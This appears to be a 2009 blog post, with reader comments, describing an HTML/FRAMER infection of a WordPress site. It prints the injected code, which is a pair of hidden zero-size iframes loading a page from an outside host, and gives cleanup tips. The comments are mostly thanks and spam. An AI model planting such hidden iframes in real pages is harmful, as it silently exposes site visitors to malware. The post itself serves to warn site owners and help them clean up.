HTML/FRAMER virus alert from AVG
I found the HTML/FRAMER virus had infected this site. It has been eradicated!
For those interested, the following code (commented for security) was inserted into the main index (index.php) by some hacker. For those of you with WordPress blogs I suggest you check you index.php file, the malicious code is inserted at the end on index.php. Other forms of the virus encode the iframe attack.
<!– <iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> –>
Popularity: 17% [?]














(4 votes, average: 9.50 out of 10)
July 27th, 2009 at 5:30 am
Hello, woh did you get rid of it. I have the same problem.
July 27th, 2009 at 5:45 am
I opened index.php with the theme editor, and simply deleted the php code described in the article. The malicious code appears at the very end of the php file, at least for me. Seems like many people are getting this as an encoded bit of php. There should not be any encoded portions of legitamate WP themes.
July 27th, 2009 at 2:48 pm
I did that too, but it keeps re appearing… is really bad. I scanned my pc with anti malware and it seems that I had some keyloggers and some other html virus that damaged my sites.
I hope that this time I will get rid of them forever…
August 5th, 2009 at 7:08 am
my sites suffered this too. More than 10,000 files affected, including .php, .htm, and .html on my entire server. Imagine that. Luckly for me i found a search/replace script that saved me. this damn thing got my site blocked in google, displaying warnings to users.
December 17th, 2009 at 5:05 pm
Thanks for posting this. Answered my google warning message. Thanks Yahoo!
July 15th, 2010 at 10:20 am
HELP!!! i am glad you found a way to get rid of this. BUT WHERE DO I START???? i am not too saavy yet at puter. please point me to where and how, PLEASE!!!!
February 2nd, 2011 at 10:35 pm
High quality article dude. It’s good to go through. many thanks for spending time to write down great things for us.
March 1st, 2011 at 9:36 pm
Thanks for the post, this is the best solution I’ve been able to find.
December 3rd, 2011 at 10:49 pm
Awesome article once again. Thanks a lot.
December 9th, 2011 at 1:16 pm
disneyland…
[...]3monkeys » HTML/FRAMER virus alert from AVG[...]…
December 26th, 2011 at 9:52 am
I am not sure where you are getting your information, but great topic. I needs to spend some time learning much more or understanding more. Thanks for magnificent information I was looking for this information for my mission.
December 27th, 2011 at 12:13 am
Thank you for the sensible critique. Me and my neighbor were just preparing to do a little research on this. We grabbed a book from our local library but I think I learned more from this post. I’m very glad to see such great information being shared freely out there.
January 19th, 2012 at 6:53 am
hello there and thank you for your information – I’ve definitely picked up something new from right here. I did however expertise a few technical points using this website, as I experienced to reload the site lots of times previous to I could get it to load correctly. I had been wondering if your web host is OK? Not that I am complaining, but sluggish loading instances times will often affect your placement in google and can damage your high-quality score if advertising and marketing with Adwords. Well I am adding this RSS to my email and can look out for a lot more of your respective interesting content. Make sure you update this again very soon..
January 19th, 2012 at 7:42 pm
Congatulation, yo have got a very nice skine on this blog.